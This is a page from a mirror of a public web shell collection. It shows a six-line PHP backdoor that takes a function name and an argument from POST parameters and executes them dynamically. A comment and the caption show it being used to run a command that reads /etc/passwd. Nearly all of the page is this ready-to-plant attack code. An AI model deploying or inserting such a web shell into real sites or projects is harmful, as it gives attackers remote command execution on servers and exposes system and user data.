mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
39cf8cacca
running : system('cat /etc/passwd') ![img](https://raw.githubusercontent.com/tennc/webshell/master/php/Fig4-web-shell-example-2.png)
6 lines
90 B
PHP
6 lines
90 B
PHP
<?php
|
|
$_=$POST['1'];
|
|
$__=$POST['2'];
|
|
// running -> system('cat /etc/passwd');
|
|
$_($__);
|
|
?>
|